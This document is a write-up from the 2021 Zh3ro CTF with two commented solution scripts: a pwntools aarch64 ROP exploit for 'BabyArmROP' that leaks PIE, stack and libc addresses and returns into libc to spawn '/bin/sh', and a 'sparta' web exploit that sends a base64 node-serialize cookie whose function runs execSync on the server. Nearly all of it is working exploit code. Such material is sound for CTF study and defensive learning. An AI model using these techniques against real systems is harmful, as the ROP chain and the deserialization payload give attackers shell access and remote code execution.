2021 Zh3ro CTF
  • web
    • sparta
  • pwn
    • BabyArmROP
# BabyArmROP (pwn, 2021 Zh3ro CTF) -- aarch64 ROP exploit driven with pwntools.
#
# Flow, as the interactions below show:
#   1. echo-back leak of a program-text pointer  -> PIE base
#   2. stack overflow, re-enter the vulnerable function, echo-back leak of a
#      stack pointer
#   3. overflow into a csu_init-style gadget pair that calls back into the
#      binary and prints a pointer-sized value -> libc base
#   4. overflow into a libc gadget that loads x0 and returns into libc with
#      x0 -> "/bin/sh" (a system("/bin/sh") call, going by the labels)
#
# Every offset used below (0x8a8, 0x87c, 0x82c, 0x8b0, 0x900, 0x920, 0x958,
# 0x11030, 0x7e7, 0x850, 0x4db38, 0x106f14, 0x3f218, 0x1265d0) is specific to
# the challenge binary and the libc shipped with it; nothing here derives
# them, so the script only works against that exact build.
from pwn import *
context.log_level = 'debug'
# Local run under qemu-user with the gdbstub on :1234 (swap in for the
# remote() line when debugging):
# p = process('./qemu-aarch64 -L . -g 1234 ./vuln'.split(' '))
p = remote('pwn.zh3r0.cf', 1111)
# Parsed but never referenced below; every address is hard-coded instead.
e = ELF('./vuln')
# --- stage 1: PIE leak -------------------------------------------------------
# The service echoes the input back; the 4 bytes following our 8 'a's are
# taken as a text address that sits at offset 0x8a8 in the image. Only 32
# bits are read (u32), so the chain relies on the program being mapped below
# 4 GiB. NOTE(review): the `mov w0, w22` gadget in stage 3 also truncates to
# 32 bits, so this looks deliberate for the challenge's qemu setup; confirm
# before reusing against a differently mapped target.
p.send('a'*8)
p.recvuntil('a'*8)
pie_leak = u32(p.recv(4))
pie_base = pie_leak - 0x8a8
info('pie_leak: ' + hex(pie_leak))
info('pie_base: ' + hex(pie_base))
# --- stage 2: stack leak -----------------------------------------------------
# 0x28 bytes of filler reach the saved frame. The register labels are the
# author's and say which slot each qword is restored from.
payload = b'a'*0x28
payload += p64(pie_base + 0x87c) # w30 : sp += 0x30 -- epilogue gadget: skips over the frame and returns into the next slot
payload += b'b'*0x8 # w29
payload += p64(pie_base + 0x82c) # vuln -- re-enter the vulnerable function for a second read/echo round
payload += b'A'*0x8*4
payload += p64(0) # w29 = NULL
payload += p64(pie_base + 0x8b0) # w30 = sp += 10, ret
p.sendafter(':', payload)
# Second echo round: the 6 bytes after our marker are a stack address
# (zero-extended to 8 bytes for u64).
p.send('k'*0x8)
p.recvuntil('k'*0x8)
stack_leak = u64(p.recv(6) + b'\0\0')
info('stack_leak: ' + hex(stack_leak))
# --- stage 3: libc leak via a csu_init-style gadget pair ---------------------
payload = b'a'*0x28
payload += p64(pie_base + 0x920) # return here: restores x19..x24, x29, x30 from the slots below, then ret
payload += p64(0) # w29
# 0x0000000000000900: ldr x3, [x21, x19, lsl #3]; mov x2, x24; add x19, x19, #1; mov x1, x23; mov w0, w22; blr x3;
# i.e. call *(x21 + 8*x19) with (w0, x1, x2) = (w22, x23, x24). Note that
# w0/w22 are 32-bit registers: the first argument is truncated to 32 bits.
payload += p64(pie_base + 0x900) # w30 (ret)
payload += p64(0) # x19 -> 0  (index into the pointer table)
payload += p64(0) # x20 -> 0
# x21: pointer-table base. stack_leak - 0x98 appears to be the stack address
# of the `pie_base + 0x850` slot further down this payload, so the gadget
# loads its call target x3 from our own data.
payload += p64(stack_leak - 0x98)
payload += p64(pie_base + 0x958) # x22 (arg0) -- a string in the binary; the reply starts with 'Hello, '
payload += p64(pie_base + 0x11030) # x23 (arg1) -- presumably a GOT slot; whatever it points at is what gets printed
payload += p64(pie_base + 0x7e7) # x24 (arg2)
payload += p64(pie_base + 0x850) # call printf in vuln -- loaded into x3 by the 0x900 gadget above
payload += p64(pie_base + 0x8b0) # sp += 10, ret
p.sendafter(':', payload)
p.recvuntil('Hello, ')
# Again only 4 bytes / 32 bits are read; 0x4db38 is the offset of the leaked
# libc symbol within the challenge's libc.
libc_leak = u32(p.recv(4))
libc_base = libc_leak - 0x4db38
info('libc_leak: ' + hex(libc_leak))
info('libc_base: ' + hex(libc_base))
# --- stage 4: x0 = "/bin/sh", return into libc ---------------------------------
payload = b'a'*0x28
# 0x0000000000106f14: ldr x0, [sp, #0x28]; ldp x29, x30, [sp], #0x30; ret;
# The gadget takes x0 from the last qword of the payload ("binsh") and x30
# from one of the five identical copies below (the repetition makes the
# layout insensitive to exactly which slot lands at sp+8), so execution
# continues at libc_base + 0x3f218 with x0 -> "/bin/sh". That target is
# unlabelled here; system() is the obvious candidate -- confirm against the
# challenge libc.
payload += p64(libc_base + 0x106f14)
payload += p64(libc_base + 0x3f218) * 5
payload += p64(libc_base + 0x1265d0) # binsh
p.sendafter(':', payload)
# Hand the (expected) shell over to the user.
p.interactive()
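import requests
import base64

# sparta (web, 2021 Zh3ro CTF).
#
# The server reads the `guest` cookie as base64-encoded JSON. Judging by the
# `_$$ND_FUNC$$_` marker this payload depends on, it rebuilds that JSON with
# node-serialize, which turns a string carrying that prefix back into a
# JavaScript function; the trailing `()` makes it an IIFE, so the function is
# executed during unserialize itself (the well-known node-serialize RCE
# pattern) and `execSync` runs on the server. The command output is *thrown*
# rather than returned so it surfaces in the error response; this relies on
# the server echoing the exception text back to the client.
TARGET_URL = 'http://web.zh3r0.cf:6666/guest'

# Serialized object: `username.toString` is the string node-serialize
# rebuilds into a function.
MALICIOUS_OBJECT = b'''
{"username":{"toString":"_$$ND_FUNC$$_(()=>{throw require('child_process').execSync('cat /flag.txt')})()"}}
'''.strip()

res = requests.post(
    TARGET_URL,
    headers={
        # Same bytes on the wire as the original b'guest=' + b64 concatenation;
        # a str header value avoids mixing bytes and str in the headers dict.
        'Cookie': 'guest=' + base64.b64encode(MALICIOUS_OBJECT).decode('ascii'),
    },
    # Bound the wait so the script cannot hang forever if the target stalls.
    timeout=10,
)
# Deliberately no raise_for_status(): the flag is expected inside an error
# page, so a non-2xx status is the success case here.
print(res.text)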